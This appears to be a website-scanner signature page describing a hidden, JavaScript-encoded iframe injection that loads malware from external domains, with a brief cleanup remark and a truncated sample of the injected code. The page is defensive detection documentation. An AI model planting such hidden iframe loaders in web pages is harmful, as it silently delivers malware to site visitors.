SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware-entry-mwiframehd371



A hidden and malicious iframe was identified. It is encoded through javascript to make it hard to identify the source.

It loads malware from multiple sources:
 (and many other domains).

This is used to load malware from external web sites while not being visible to the user.


Any web site

Clean up:

This malware is generally hidden on .js or .php files without heavy encoding.


Malware dump (sample of malware):

var url="";if((navigator.userAgent.toLowerCase().indexOf("msie")... f=document.createElement..